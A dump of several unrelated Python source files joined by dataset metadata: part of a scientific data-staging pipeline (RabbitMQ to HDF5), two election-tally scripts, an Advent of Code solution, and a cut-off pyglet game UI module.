self.o_queue.put(QueueMessage(MessageType.Process, DataBlob(i, o)))\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n\n end = time.time()\n print(f\"Spend {end - start} at {self.__class__.__name__}\")\n\n\nclass RMQMessage(object):\n \"\"\"\n Represents a RabbitMQ incoming message from AMSLib.\n\n Attributes:\n body: The body of the message as received from RabbitMQ\n \"\"\"\n\n def __init__(self, body: str):\n self.body = body\n\n def header_format(self) -> str:\n \"\"\"\n This string represents the AMS format in Python pack format:\n See https://docs.python.org/3/library/struct.html#format-characters\n - 1 byte is the size of the header (here 12). Limit max: 255\n - 1 byte is the precision (4 for float, 8 for double). Limit max: 255\n - 2 bytes are the MPI rank (0 if AMS is not running with MPI). Limit max: 65535\n - 4 bytes are the number of elements in the message. Limit max: 2^32 - 1\n - 2 bytes are the input dimension. Limit max: 65535\n - 2 bytes are the output dimension. Limit max: 65535\n - 4 bytes are for aligning memory to 8\n\n |__Header_size__|__Datatype__|__Rank__|__#elem__|__InDim__|__OutDim__|...real data...|\n\n Then the data starts at 12 and is structered as pairs of input/outputs.\n Let K be the total number of elements, then we have K pairs of inputs/outputs (either float or double):\n\n |__Header_(12B)__|__Input 1__|__Output 1__|...|__Input_K__|__Output_K__|\n\n \"\"\"\n return \"BBHIHHI\"\n\n def endianness(self) -> str:\n \"\"\"\n '=' means native endianness in standart size (system).\n See https://docs.python.org/3/library/struct.html#format-characters\n \"\"\"\n return \"=\"\n\n def encode(num_elem: int, input_dim: int, output_dim: int, dtype_byte: int = 4) -> bytes:\n \"\"\"\n For debugging and testing purposes, this function encode a message identical to what AMS would send\n \"\"\"\n header_format = self.endianness() + self.header_format()\n hsize = struct.calcsize(header_format)\n assert dtype_byte in [4, 8]\n dt = \"f\" if dtype_byte == 4 else \"d\"\n mpi_rank = 0\n data = np.random.rand(num_elem * (input_dim + output_dim))\n header_content = (hsize, dtype_byte, mpi_rank, data.size, input_dim, output_dim)\n # float or double\n msg_format = f\"{header_format}{data.size}{dt}\"\n return struct.pack(msg_format, *header_content, *data)\n\n def _parse_header(self, body: str) -> dict:\n \"\"\"\n Parse the header to extract information about data.\n \"\"\"\n fmt = self.endianness() + self.header_format()\n if len(body) == 0:\n print(f\"Empty message. skipping\")\n return {}\n\n hsize = struct.calcsize(fmt)\n res = {}\n # Parse header\n (\n res[\"hsize\"],\n res[\"datatype\"],\n res[\"mpirank\"],\n res[\"num_element\"],\n res[\"input_dim\"],\n res[\"output_dim\"],\n res[\"padding\"],\n ) = struct.unpack(fmt, body[:hsize])\n assert hsize == res[\"hsize\"]\n assert res[\"datatype\"] in [4, 8]\n if len(body) < hsize:\n print(f\"Incomplete message of size {len(body)}. Header should be of size {hsize}. skipping\")\n return {}\n\n # Theoritical size in Bytes for the incoming message (without the header)\n # Int() is needed otherwise we might overflow here (because of uint16 / uint8)\n res[\"dsize\"] = int(res[\"datatype\"]) * int(res[\"num_element\"]) * (int(res[\"input_dim\"]) + int(res[\"output_dim\"]))\n res[\"msg_size\"] = hsize + res[\"dsize\"]\n res[\"multiple_msg\"] = len(body) != res[\"msg_size\"]\n return res\n\n def _parse_data(self, body: str, header_info: dict) -> np.array:\n data = np.array([])\n if len(body) == 0:\n return data\n hsize = header_info[\"hsize\"]\n dsize = header_info[\"dsize\"]\n try:\n if header_info[\"datatype\"] == 4: # if datatype takes 4 bytes (float)\n data = np.frombuffer(body[hsize : hsize + dsize], dtype=np.float32)\n else:\n data = np.frombuffer(body[hsize : hsize + dsize], dtype=np.float64)\n except ValueError as e:\n print(f\"Error: {e} => {header_info}\")\n return np.array([])\n\n idim = header_info[\"input_dim\"]\n odim = header_info[\"output_dim\"]\n data = data.reshape((-1, idim + odim))\n # Return input, output\n return data[:, :idim], data[:, idim:]\n\n def _decode(self, body: str) -> Tuple[np.array]:\n input = []\n output = []\n # Multiple AMS messages could be packed in one RMQ message\n while body:\n header_info = self._parse_header(body)\n temp_input, temp_output = self._parse_data(body, header_info)\n print(f\"input shape {temp_input.shape} outpute shape {temp_output.shape}\")\n # total size of byte we read for that message\n chunk_size = header_info[\"hsize\"] + header_info[\"dsize\"]\n input.append(temp_input)\n output.append(temp_output)\n # We remove the current message and keep going\n body = body[chunk_size:]\n return np.concatenate(input), np.concatenate(output)\n\n def decode(self) -> Tuple[np.array]:\n return self._decode(self.body)\n\n\nclass RMQLoaderTask(Task):\n \"\"\"\n A RMQLoaderTask consumes data from RabbitMQ bundles the data of\n the files into batches and forwards them to the next task waiting on the\n output queuee.\n\n Attributes:\n o_queue: The output queue to write the transformed messages\n credentials: A JSON file with the credentials to log on the RabbitMQ server.\n certificates: TLS certificates\n rmq_queue: The RabbitMQ queue to listen to.\n prefetch_count: Number of messages prefected by RMQ (impact performance)\n \"\"\"\n\n def __init__(self, o_queue, credentials, cacert, rmq_queue, prefetch_count=1):\n self.o_queue = o_queue\n self.credentials = credentials\n self.cacert = cacert\n self.rmq_queue = rmq_queue\n self.prefetch_count = prefetch_count\n\n # Installing signal callbacks\n p = current_process()\n print(f\"pid = {p.pid}\")\n signal.signal(signal.SIGTERM, self.signal_wrapper(self.__class__.__name__, p.pid))\n signal.signal(signal.SIGINT, self.signal_wrapper(self.__class__.__name__, p.pid))\n self.total_time = 0\n\n self.rmq_consumer = RMQConsumer(\n credentials=self.credentials,\n cacert=self.cacert,\n queue=self.rmq_queue,\n on_message_cb=self.callback_message,\n on_close_cb=self.callback_close,\n prefetch_count=self.prefetch_count,\n )\n\n def callback_close(self):\n \"\"\"\n Callback that will be called when RabbitMQ will close\n the connection (or if a problem happened with the connection).\n \"\"\"\n print(f\"Sending Terminate to QueueMessage\")\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n\n def callback_message(self, ch, basic_deliver, properties, body):\n \"\"\"\n Callback that will be called each time a message will be consummed.\n the connection (or if a problem happened with the connection).\n \"\"\"\n start_time = time.time()\n input_data, output_data = RMQMessage(body).decode()\n row_size = input_data[0, :].nbytes + output_data[0, :].nbytes\n rows_per_batch = int(np.ceil(BATCH_SIZE / row_size))\n num_batches = int(np.ceil(input_data.shape[0] / rows_per_batch))\n input_batches = np.array_split(input_data, num_batches)\n output_batches = np.array_split(output_data, num_batches)\n\n for j, (i, o) in enumerate(zip(input_batches, output_batches)):\n self.o_queue.put(QueueMessage(MessageType.Process, DataBlob(i, o)))\n\n self.total_time += time.time() - start_time\n\n def signal_wrapper(self, name, pid):\n def handler(signum, frame):\n print(f\"Received SIGNUM={signum} for {name}[pid={pid}]: stopping process\")\n self.rmq_consumer.stop()\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n print(f\"Spend {self.total_time} at {self.__class__.__name__}\")\n\n return handler\n\n def __call__(self):\n \"\"\"\n Busy loop of reading all files matching the pattern and creating\n '100' batches which will be pushed on the queue. Upon reading all files\n the Task pushes a 'Terminate' message to the queue and returns.\n \"\"\"\n self.rmq_consumer.run()\n\n\nclass FSWriteTask(Task):\n \"\"\"\n A Class representing a task flushing data in the specified output directory\n\n Attributes:\n i_queue: The input queue to read data from.\n o_queue: The output queue to write the path of the saved file.\n writer_cls: A child class inheriting from FileWriter that writes to the specified file.\n out_dir: The directory to write data to.\n \"\"\"\n\n def __init__(self, i_queue, o_queue, writer_cls, out_dir):\n \"\"\"\n initializes the writer task to read data from the i_queue write them using\n the writer_cls and store the data in the out_dir.\n \"\"\"\n self.data_writer_cls = writer_cls\n self.out_dir = out_dir\n self.i_queue = i_queue\n self.o_queue = o_queue\n self.suffix = writer_cls.get_file_format_suffix()\n\n def __call__(self):\n \"\"\"\n A busy loop reading messages from the i_queue, writting the input,output data in a file\n using the instances 'writer_cls' and inform the task waiting on the output_q about the\n path of the file.\n \"\"\"\n\n start = time.time()\n while True:\n fn = get_unique_fn()\n fn = f\"{self.out_dir}/{fn}.{self.suffix}\"\n is_terminate = False\n total_bytes_written = 0\n with self.data_writer_cls(fn) as fd:\n bytes_written = 0\n while True:\n # This is a blocking call\n item = self.i_queue.get(block=True)\n if item.is_terminate():\n is_terminate = True\n elif item.is_process():\n data = item.data()\n bytes_written += data.inputs.size * data.inputs.itemsize\n bytes_written += data.outputs.size * data.outputs.itemsize\n fd.store(data.inputs, data.outputs)\n total_bytes_written += data.inputs.size * data.inputs.itemsize\n total_bytes_written += data.outputs.size * data.outputs.itemsize\n # FIXME: We currently decide to chunk files to 2GB\n # of contents. Is this a good size?\n if is_terminate or bytes_written >= 2 * 1024 * 1024 * 1024:\n break\n\n self.o_queue.put(QueueMessage(MessageType.Process, fn))\n if is_terminate:\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n break\n\n end = time.time()\n print(f\"Spend {end - start} {total_bytes_written} at {self.__class__.__name__}\")\n\n\nclass PushToStore(Task):\n \"\"\"\n PushToStore is the epilogue of the pipeline. Effectively (if instructed so) it informs the kosh store\n about the existence of a new file.\n\n Attributes:\n ams_config: The AMS configuration storing information regarding the AMS setup.\n i_queue: The queue to read file locations from\n dir: The directory of the database\n store: The Kosh Store\n \"\"\"\n\n def __init__(self, i_queue, ams_config, db_path, store):\n \"\"\"\n Tnitializes the PushToStore Task. It reads files from i_queue, if the file\n is not under db_path, it copies the file to this location and if store defined\n it makes the kosh-store aware about the existence of the file.\n \"\"\"\n\n self.ams_config = ams_config\n self.i_queue = i_queue\n self.dir = Path(db_path).absolute()\n self._store = store\n if not self.dir.exists():\n self.dir.mkdir(parents=True, exist_ok=True)\n\n def __call__(self):\n \"\"\"\n A busy loop reading messages from the i_queue publishing them to the kosh store.\n \"\"\"\n start = time.time()\n if self._store:\n db_store = AMSDataStore(\n self.ams_config.db_path, self.ams_config.db_store, self.ams_config.name, False\n ).open()\n\n while True:\n item = self.i_queue.get(block=True)\n if item.is_terminate():\n break\n elif item.is_process():\n src_fn = Path(item.data())\n dest_file = self.dir / src_fn.name\n if src_fn != dest_file:\n shutil.move(src_fn, dest_file)\n\n if self._store:\n db_store.add_candidates([str(dest_file)])\n\n end = time.time()\n print(f\"Spend {end - start} at {self.__class__.__name__}\")\n\n\nclass Pipeline(ABC):\n \"\"\"\n An interface class representing a sequence of transformations/actions to be performed\n to store data in the AMS kosh-store. The actions can be performed either sequentially,\n or in parallel using different poclies/vehicles (threads or processes).\n\n Attributes:\n ams_config: The AMS configuration required when publishing to the AMS store.\n dest_dir: The final path to store data to.\n stage_dir: An intermediate location to store files. Usefull if the configuration requires\n storing the data in some scratch directory (SSD) before making them public to the parallel filesystem.\n actions: A list of actions to be performed before storing the data in the filesystem\n db_type: The file format of the data to be stored\n writer: The class to be used to write data to the filesystem.\n \"\"\"\n\n supported_policies = {\"sequential\", \"thread\", \"process\"}\n supported_writers = {\"shdf5\", \"dhdf5\", \"csv\"}\n\n def __init__(self, db_dir, store, dest_dir=None, stage_dir=None, db_type=\"hdf5\"):\n \"\"\"\n initializes the Pipeline class to write the final data in the 'dest_dir' using a file writer of type 'db_type'\n and optionally caching the data in the 'stage_dir' before making them available in the cache store.\n \"\"\"\n self.ams_config = AMSInstance.from_path(db_dir)\n\n if dest_dir is not None:\n self.dest_dir = dest_dir\n\n if dest_dir is None and store:\n self.dest_dir = self.ams_config.db_path\n\n self.stage_dir = self.dest_dir\n\n if stage_dir is not None:\n self.stage_dir = stage_dir\n\n self.actions = list()\n\n self.db_type = db_type\n\n self._writer = get_writer(self.db_type)\n\n self.store = store\n\n def add_data_action(self, callback):\n \"\"\"\n Adds an action to be performed at the data before storing them in the filesystem\n\n Args:\n callback: A callback to be called on every input, output.\n \"\"\"\n if not callable(callback):\n raise TypeError(f\"{self.__class__.__name__} requires a callable as an argument\")\n\n self.actions.append(callback)\n\n def _seq_execute(self):\n \"\"\"\n Executes all tasks sequentially. Every task starts after all incoming messages\n are processed by the previous task.\n \"\"\"\n for t in self._tasks:\n t()\n\n def _parallel_execute(self, exec_vehicle_cls):\n \"\"\"\n parallel execute of all tasks using the specified vehicle type\n\n Args:\n exec_vehicle_cls: The class to be used to generate entities\n executing actions by reading data from i/o_queue(s).\n \"\"\"\n executors = list()\n for a in self._tasks:\n executors.append(exec_vehicle_cls(target=a))\n\n for e in executors:\n e.start()\n\n for e in executors:\n e.join()\n\n def _execute_tasks(self, policy):\n \"\"\"\n Executes all tasks using the specified policy\n\n Args:\n policy: The policy to be used to execute the pipeline\n \"\"\"\n executors = {\"thread\": Thread, \"process\": Process}\n\n if policy == \"sequential\":\n self._seq_execute()\n return\n\n self._parallel_execute(executors[policy])\n return\n\n def _link_pipeline(self, policy):\n \"\"\"\n Links all actions/stages of the pipeline with input/output queues.\n\n Args:\n policy: The policy to be used to execute the pipeline\n \"\"\"\n _qType = self.get_q_type(policy)\n # We need 1 queue to copy incoming data to the pipeline\n # Every action requires 1 input and one output q. But the output\n # q is used as an inut q on the next action thus we need num actions -1.\n # 2 extra queues to store to data-store and publish on kosh\n num_queues = 1 + len(self.actions) - 1 + 2\n self._queues = [_qType() for i in range(num_queues)]\n\n self._tasks = [self.get_load_task(self._queues[0])]\n for i, a in enumerate(self.actions):\n self._tasks.append(ForwardTask(self._queues[i], self._queues[i + 1], a))\n\n # After user actions we store into a file\n self._tasks.append(FSWriteTask(self._queues[-2], self._queues[-1], self._writer, self.stage_dir))\n # After storing the file we make it public to the kosh store.\n self._tasks.append(PushToStore(self._queues[-1], self.ams_config, self.dest_dir, self.store))\n\n def execute(self, policy):\n \"\"\"\n Execute the pipeline of tasks using the specified policy (blocking).\n\n Args:\n policy: The policy to be used to execute the pipeline\n \"\"\"\n if policy not in self.__class__.supported_policies:\n raise RuntimeError(\n f\"Pipeline execute does not support policy: {policy}, please select from {Pipeline.supported_policies}\"\n )\n\n # Create a pipeline of actions and link them with appropriate queues\n self._link_pipeline(policy)\n # Execute them\n self._execute_tasks(policy)\n\n @abstractmethod\n def get_load_task(self, o_queue):\n \"\"\"\n Callback to the child class to return the task that loads data from some unspecified entry-point.\n \"\"\"\n pass\n\n @staticmethod\n @abstractmethod\n def add_cli_args(parser):\n \"\"\"\n Initialize root pipeline class cli parser with the options.\n \"\"\"\n parser.add_argument(\"--dest\", \"-d\", dest=\"dest_dir\", help=\"Where to store the data (Directory should exist)\")\n parser.add_argument(\n \"--stage-dir\",\n dest=\"stage_dir\",\n help=\"Where to 'stage' data (some directory either under /dev/shm/ or under local storage (SSD)\",\n default=None,\n )\n parser.add_argument(\n \"--db-type\",\n dest=\"db_type\",\n choices=Pipeline.supported_writers,\n help=\"File format to store the data to\",\n default=\"dhdf5\",\n )\n # parser.add_argument(\"--db-dir\", \"-d\", help=\"path to the AMS store directory\", required=True)\n parser.add_argument(\"--persistent-db-path\", \"-db\", help=\"The path of the AMS database\", required=True)\n parser.add_argument(\"--store\", dest=\"store\", action=\"store_true\")\n parser.add_argument(\"--no-store\", dest=\"store\", action=\"store_false\")\n parser.set_defaults(store=True)\n return\n\n @abstractclassmethod\n def from_cli(cls):\n pass\n\n @staticmethod\n def get_q_type(policy):\n \"\"\"\n Returns the type of the queue to be used to create Queues for the specified policy.\n \"\"\"\n\n p_to_type = {\"sequential\": ser_queue, \"thread\": ser_queue, \"process\": mp_queue}\n return p_to_type[policy]\n\n\nclass FSPipeline(Pipeline):\n \"\"\"\n A 'Pipeline' reading data from the Filesystem and storing them back to the filesystem.\n\n Attributes:\n src: The source directory to read data from.\n pattern: The pattern to glob files from.\n src_type: The file format of the source data\n \"\"\"\n\n supported_readers = (\"shdf5\", \"dhdf5\", \"csv\")\n\n def __init__(self, db_dir, store, dest_dir, stage_dir, db_type, src, src_type, pattern):\n \"\"\"\n Initialize a FSPipeline that will write data to the 'dest_dir' and optionally publish\n these files to the kosh-store 'store' by using the stage_dir as an intermediate directory.\n \"\"\"\n super().__init__(db_dir, store, dest_dir, stage_dir, db_type)\n self._src = Path(src)\n self._pattern = pattern\n self._src_type = src_type\n\n def get_load_task(self, o_queue):\n \"\"\"\n Return a Task that loads data from the filesystem\n\n Args:\n o_queue: The queue the load task will push read data.\n\n Returns: An FSLoaderTask instance reading data from the filesystem and forwarding the values to the o_queue.\n \"\"\"\n loader = get_reader(self._src_type)\n return FSLoaderTask(o_queue, loader, pattern=str(self._src) + \"/\" + self._pattern)\n\n @staticmethod\n def add_cli_args(parser):\n \"\"\"\n Add cli arguments to the parser required by this Pipeline.\n \"\"\"\n Pipeline.add_cli_args(parser)\n parser.add_argument(\"--src\", \"-s\", help=\"Where to copy the data from\", required=True)\n parser.add_argument(\"--src-type\", \"-st\", choices=FSPipeline.supported_readers, default=\"shdf5\")\n parser.add_argument(\"--pattern\", \"-p\", help=\"Glob pattern to read data from\", required=True)\n return\n\n @classmethod\n def from_cli(cls, args):\n \"\"\"\n Create FSPipeline from the user provided CLI.\n \"\"\"\n return cls(\n args.persistent_db_path,\n args.store,\n args.dest_dir,\n args.stage_dir,\n args.db_type,\n args.src,\n args.src_type,\n args.pattern,\n )\n\n\nclass RMQPipeline(Pipeline):\n \"\"\"\n A 'Pipeline' reading data from RabbitMQ and storing them back to the filesystem.\n\n Attributes:\n credentials: The JSON credentials to connect to RMQ Server\n cacert: The TLS certificate\n rmq_queue: The RMQ queue to listen to.\n \"\"\"\n\n def __init__(self, db_dir, store, dest_dir, stage_dir, db_type, credentials, cacert, rmq_queue):\n \"\"\"\n Initialize a RMQPipeline that will write data to the 'dest_dir' and optionally publish\n these files to the kosh-store 'store' by using the stage_dir as an intermediate directory.\n \"\"\"\n super().__init__(db_dir, store, dest_dir, stage_dir, db_type)\n self._credentials = Path(credentials)\n self._cacert = Path(cacert)\n self._rmq_queue = rmq_queue\n\n def get_load_task(self, o_queue):\n \"\"\"\n Return a Task that loads data from the filesystem\n\n Args:\n o_queue: The queue the load task will push read data.\n\n Returns: An RMQLoaderTask instance reading data from the filesystem and forwarding the values to the o_queue.\n \"\"\"\n return RMQLoaderTask(o_queue, self._credentials, self._cacert, self._rmq_queue)\n\n @staticmethod\n def add_cli_args(parser):\n \"\"\"\n Add cli arguments to the parser required by this Pipeline.\n \"\"\"\n Pipeline.add_cli_args(parser)\n parser.add_argument(\"-c\", \"--creds\", help=\"Credentials file (JSON)\", required=True)\n parser.add_argument(\"-t\", \"--cert\", help=\"TLS certificate file\", required=True)\n parser.add_argument(\"-q\", \"--queue\", help=\"On which queue to receive messages\", required=True)\n return\n\n @classmethod\n def from_cli(cls, args):\n \"\"\"\n Create RMQPipeline from the user provided CLI.\n \"\"\"\n print(\"Creating database from here\", args.persistent_db_path)\n return cls(\n args.persistent_db_path,\n args.store,\n args.dest_dir,\n args.stage_dir,\n args.db_type,\n args.creds,\n args.cert,\n args.queue,\n )\n\n\ndef get_pipeline(src_mechanism=\"fs\"):\n \"\"\"\n Factory method to return the pipeline mechanism for the given source entry point\n\n Args:\n src_mechanism: The entry mechanism to read data from.\n\n Returns: A Pipeline class to start the stage AMS service\n \"\"\"\n PipeMechanisms = {\"fs\": FSPipeline, \"network\": RMQPipeline}\n if src_mechanism not in PipeMechanisms.keys():\n raise RuntimeError(f\"Pipeline {src_mechanism} storing mechanism does not exist\")\n\n return PipeMechanisms[src_mechanism]\n","repo_name":"LLNL/AMS","sub_path":"src/AMSWorkflow/ams/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":30779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7300209467","text":"import os\r\nimport csv\r\n\r\nelection_csv = os.path.join(r\"C:\\Users\\aajanaku\\OneDrive - Above the Treeline, Inc\\Desktop\\Resource\", \"election_data.csv\")\r\noutput_file = \"election_results.txt\"\r\n\r\ncandidate_counts = {}\r\nballot_counts = {}\r\n\r\n# Open and read csv\r\nwith open(election_csv) as csv_file:\r\n reader = csv.reader(csv_file, delimiter=\",\")\r\n\r\n csv_header = next(reader)\r\n\r\n for row in reader:\r\n candidate = row[2]\r\n if candidate in candidate_counts:\r\n candidate_counts[candidate] += 1\r\n else:\r\n candidate_counts[candidate] = 1\r\n\r\n # Count the unique ballots using a dictionary\r\n ballot_id = row[0]\r\n if ballot_id in ballot_counts:\r\n ballot_counts[ballot_id] += 1\r\n else:\r\n ballot_counts[ballot_id] = 1\r\n\r\n# Calculate total ballot count\r\ntotal_ballots = len(ballot_counts)\r\n\r\n# Open the output file in write mode\r\nwith open(output_file, \"w\") as f:\r\n # Write the total ballot count\r\n f.write(f\"Total Votes: {total_ballots}\\n\")\r\n\r\n # Write vote counts and percentages for each candidate\r\n for candidate, count in candidate_counts.items():\r\n percentage = (count / total_ballots) * 100\r\n f.write(f\"{candidate}: {count} ({percentage:.2f}%)\\n\")\r\n\r\n # Determine and write the winner\r\n winner = max(candidate_counts, key=candidate_counts.get)\r\n f.write(f\"Winner: {winner}\\n\")\r\n\r\n# Print a message indicating the results were written to the file\r\nprint(\"Election results written to the file:\", output_file)\r\n","repo_name":"aajanaku/python-challenge","sub_path":"Pypoll/Pypoll.py","file_name":"Pypoll.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30709054732","text":"# Import libaries\nimport pandas as pd\n\n# Print what I'm doing\nprint('Election Results')\nprint('--------------------')\n\n# Read data\ndata = 'election_data_1.csv'\ndata_df = pd.read_csv(data)\n\ndata_df.head()\n\n# Print total votes\ntotal_votes = data_df['Voter ID'].count()\n\nprint('Total Votes: ' + str(total_votes))\nprint('--------------------')\n\n# Votes/ candidate\ncandidates = data_df.groupby('Candidate')\ncandidates\n\ncandidate_votes = candidates['Voter ID'].count()\ncandidate_votes\n\n# Percent votes/ candidate\npercent_votes = round((candidate_votes/ total_votes)*100,1)\npercent_votes\n\n# New results data frame\nresults_df = pd.concat([candidate_votes, percent_votes], axis=1)\nresults_df.columns = ['Votes', 'Percent']\nprint(results_df[['Percent', 'Votes']])\n\n# Print winner\nprint('--------------------')\nwinner = results_df['Percent'].sort_values(ascending=False)\nprint('Winner: {}'.format(winner.index[0]))\nprint('--------------------')\n\n# Export results into .txt\n# 'main.py' > 'main.txt'\nf= open(\"main.txt\",\"w\")\nf.write('Election Results\\n')\nf.write('--------------------\\n')\nf.write('Total Votes: ' + str(total_votes))\nf.write('\\n--------------------\\n')\nf.write(' '+str(results_df[['Percent', 'Votes']]))\nf.write('\\n--------------------')\nf.write('\\nWinner: {}'.format(winner.index[0]))\nf.write('\\n--------------------') \nf.close() \n\n\n","repo_name":"nasavish/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26485378124","text":"\"\"\"Advent of code Day 4 part 1 and 2\"\"\"\n\nfrom __future__ import annotations\n\nimport re\nfrom datetime import datetime, time, timedelta\nfrom operator import itemgetter\n\n\nclass Guard:\n \"\"\"A guard who has a record of shifts\"\"\"\n\n def __init__(self, guard_id: int) -> None:\n \"\"\"Creates a Guard\"\"\"\n self.id: int = guard_id\n self.shift_record: list[Shift] = []\n\n def __repr__(self) -> str:\n return 'Guard(' + str(self.id) + ')'\n\n def __gt__(self, other):\n return self.calculate_minutes_asleep() > other.calculate_minutes_asleep()\n\n @property\n def awake_time(self) -> list[int]:\n \"\"\"A list with count of times awake\"\"\"\n awake_time = [0 for _ in range(60)]\n for i in range(60):\n for shift in self.shift_record:\n awake_time[i] += shift.awake_schedule[i]\n return awake_time\n\n @property\n def asleep_time(self) -> list[int]:\n \"\"\"A list with count of times asleep\"\"\"\n awake_time = self.awake_time\n return [len(self.shift_record) - awake_time[i] for i in range(60)]\n\n @property\n def most_sleepy_minute(self) -> int:\n \"\"\"Returns most sleepy time\"\"\"\n return min(enumerate(self.awake_time), key=itemgetter(1))[0]\n\n def add_shift(self, shift: Shift) -> None:\n \"\"\"Adds a shift to the shift record\"\"\"\n self.shift_record.append(shift)\n\n def calculate_minutes_asleep(self) -> int:\n \"\"\"Calculate the total minutes asleep\"\"\"\n return sum(shift.get_minutes_asleep() for shift in self.shift_record)\n\n\nclass Shift:\n \"\"\"A work shift\"\"\"\n\n def __init__(self, lines: list[tuple[datetime, str]]) -> None:\n \"\"\"Creates the Shift object\"\"\"\n # If empty list, they were awake the whole time\n if not lines:\n self.time_awake = timedelta(minutes=60)\n self.time_asleep = timedelta(minutes=0)\n self.awake_schedule = [1 for _ in range(60)]\n return\n\n self.time_awake = timedelta()\n self.time_asleep = timedelta()\n self.awake_schedule = [1 for _ in range(60)]\n\n last_time = datetime.combine(lines[0][0].date(), time(0))\n\n is_awake = True\n\n for line in lines:\n current_time = line[0]\n\n if is_awake:\n self.time_awake += current_time - last_time\n is_awake = False\n else:\n self.time_asleep += current_time - last_time\n for i in range(last_time.minute, current_time.minute):\n self.awake_schedule[i] -= 1\n is_awake = True\n last_time = current_time\n\n def __repr__(self) -> str:\n return 'Shift(' + str(self.time_awake) + ')'\n\n def get_minutes_asleep(self) -> int:\n \"\"\"Gets the total minutes asleep on the shift\"\"\"\n return self.time_asleep.seconds // 60\n\n\ndef main():\n \"\"\"Main function\"\"\"\n with open('input.txt', encoding='utf-8') as file:\n lines = [(datetime.fromisoformat(date_time), desc)\n for date_time, desc in re.findall(r'\\[(.+)\\] (.+)',\n file.read())]\n\n lines: list[tuple[datetime, str]] = sorted(lines, key=itemgetter(0))\n\n guard_ids = [int(x) for x in re.findall(r'#(\\d+)', ''.join(str(lines)))]\n guards: dict[Guard] = {}\n\n for guard_id in sorted(set(guard_ids)):\n guards[guard_id] = Guard(guard_id)\n\n shift_starts = [i for i, line in enumerate(\n lines) if line[1].startswith('Guard')]\n\n for i, shift_start in enumerate(shift_starts):\n guard_id = int(lines[shift_start][1].split()[1][1:])\n\n if shift_start == shift_starts[-1]:\n guards[guard_id].add_shift(Shift(lines[shift_start+1:]))\n else:\n guards[guard_id].add_shift(\n Shift(lines[shift_start+1:shift_starts[i+1]]))\n\n most_sleepy_guard = max(guards.values())\n\n print('Part 1')\n print(most_sleepy_guard.most_sleepy_minute * most_sleepy_guard.id)\n\n guard_id, time_asleep = max(\n ((key, max(item.asleep_time)) for key, item in guards.items()),\n key=itemgetter(1))\n\n print('\\nPart 2')\n print(guard_id * guards[guard_id].asleep_time.index(time_asleep))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"michaelotty/aoc2018","sub_path":"04/aoc201804.py","file_name":"aoc201804.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37720077153","text":"import rabbyt\nimport pyglet\nimport resources\n\nclass Tile(rabbyt.sprites.Sprite):\n\n def __init__(self, text, texture,*args, **kwargs):\n super(Tile, self).__init__(*args, **kwargs)\n self.text = text\n self.texture = texture\n\nclass Button(Tile):\n\n def __init__(self, text, texture, *args, **kwargs):\n self.clicked = False\n super(Button, self).__init__(text=text, texture=texture, *args, **kwargs)\n self.labels = [pyglet.text.Label(self.text, font_name='Ariel', font_size=12, \n x=self.x, y=self.y, anchor_x='center', anchor_y='center')]\n\n def on_click(self, menu, player, x, y):\n if (x > (self.x - (self.texture.width / 2)) and x < (self.x + (self.texture.width / 2))):\n if (y > (self.y - (self.texture.height / 2)) and y < (self.y + (self.texture.height / 2))):\n self.clicked = not self.clicked\n if self.clicked:\n menu.trigger.perform_action(player, self.labels[0].text)\n else:\n self.clicked = False\n else:\n self.clicked = False\n\nclass InventoryTile(Tile):\n\n def __init__(self, text, texture, *args, **kwargs):\n super(InventoryTile, self).__init__(text=text, texture=texture, *args, **kwargs)\n\n self.y_count = self.y - self.texture.height/6\n self.y_weight = self.y - self.texture.height/6\n self.y_description = self.y + self.texture.height/6\n\n self.label_description = pyglet.text.Label(text=str(self.text[0]), font_name='Ariel', font_size=12, \n x=self.x, y=self.y_description, anchor_x='center', anchor_y='center')\n self.label_stats = pyglet.text.Label(text=\"Count: \" + str(self.text[1]) + \" Weight: \" + str(self.text[2]), font_name='Ariel', font_size=12, \n x=self.x, y=self.y_count, anchor_x='center', anchor_y='center',width=self.texture.width)\n\n self.labels = [self.label_description, self.label_stats]\n\n def update(self, text):\n self.label_description.text = str(text[0])\n self.label_stats.text = \"Count: \" + str(text[1]) + \" Weight: \" + str(text[2])\n self.labels = [self.label_description, self.label_stats]\n\nclass WeaponTile(Tile):\n\n def __init__(self, *args, **kwargs):\n super(WeaponTile, self).__init__(*args, **kwargs)\n self.viewable = False\n self.spacing = 25\n self.nameY = self.y + 80 - self.spacing\n self.damY = self.y + 80 - self.spacing*2\n self.rangeY = self.y + 80 - self.spacing*4\n self.rofY = self.y + 80 - self.spacing*3\n\n\n self.label_name = pyglet.text.Label(str(self.text[0]), font_name='Press Start 2P', font_size=12, \n x=self.x - self.spacing*5, y=self.nameY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n self.label_dam = pyglet.text.Label(\"Damage: \" + str(round(float(self.text[1]))), font_name='Press Start 2P', font_size=8, \n x=self.x - self.spacing*5, y=self.damY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n self.label_range = pyglet.text.Label(\"Range: \" + str(round(float(self.text[2]))), font_name='Press Start 2P', font_size=8, \n x=self.x - self.spacing*5, y=self.rangeY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n self.label_rof = pyglet.text.Label(\"Rate of Fire: \" + str(round(float(self.text[3]), 2)), font_name='Press Start 2P', font_size=8, \n x=self.x - self.spacing*5, y=self.rofY, anchor_x='left', anchor_y='top', color=(81,143,90, 255))\n\n def render(self):\n super(WeaponTile, self).render()\n self.label_name.draw()\n self.label_dam.draw()\n self.label_range.draw()\n self.label_rof.draw()\n\nclass WeaponBox(object):\n\n def __init__(self, weapon, x=1450, y=750):\n self.spacing = 0\n self.x = x\n 